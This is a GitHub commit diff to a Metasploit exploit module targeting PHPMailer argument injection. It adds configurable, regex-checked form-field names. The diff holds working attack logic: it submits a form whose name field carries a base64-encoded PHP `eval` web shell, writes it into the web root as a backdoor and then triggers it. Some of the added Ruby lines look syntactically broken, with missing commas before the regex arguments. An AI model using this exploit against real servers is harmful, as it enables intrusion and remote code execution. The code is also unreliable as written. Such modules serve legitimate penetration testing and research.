Skip to content

Commit ae8f1c3

Browse files
erikbomberikbomb
authored
Update on phpmailer_arg_injection.rb #15810
Added Regex to validate new options
1 parent e9b2fc6 commit ae8f1c3

File tree

1 file changed

+10
-4
lines changed

1 file changed

+10
-4
lines changed

modules/exploits/multi/http/phpmailer_arg_injection.rb

Lines changed: 10 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -60,7 +60,10 @@ def initialize(info = {})
6060
])
6161
register_advanced_options(
6262
[
63-
OptInt.new('WaitTimeout', [true, 'Seconds to wait to trigger the payload', 300])
63+
OptInt.new('WaitTimeout', [true, 'Seconds to wait to trigger the payload', 300])+
64+
OptString.new('NameField', [true, 'Name of the element for the Name field', 'name'], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
65+
OptString.new('EmailField', [true, 'Name of the element for the Email field', 'email'] regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
66+
OptString.new('MessageField', [true, 'Name of the element for the Message field', 'message'] regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/)
6467
])
6568
end
6669

@@ -98,6 +101,9 @@ def trigger(trigger_uri)
98101
end
99102

100103
def exploit
104+
name_field = datastore['NameField']
105+
email_field = datastore['EmailField']
106+
message_field = datastore['MessageField']
101107
payload_file_name = "#{rand_text_alphanumeric(8)}.php"
102108
payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
103109

@@ -111,9 +117,9 @@ def exploit
111117

112118
data = Rex::MIME::Message.new
113119
data.add_part('submit', nil, nil, 'form-data; name="action"')
114-
data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, 'form-data; name="name"')
115-
data.add_part(email, nil, nil, 'form-data; name="email"')
116-
data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, 'form-data; name="message"')
120+
data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, "form-data; name='#{name_field}'")
121+
data.add_part(email, nil, nil, "form-data; name='#{email_field}'")
122+
data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, "form-data; name='#{message_field}'")
117123

118124
print_status("Writing the backdoor to #{payload_file_path}")
119125
res = send_request_cgi(

0 commit comments

Comments
 (0)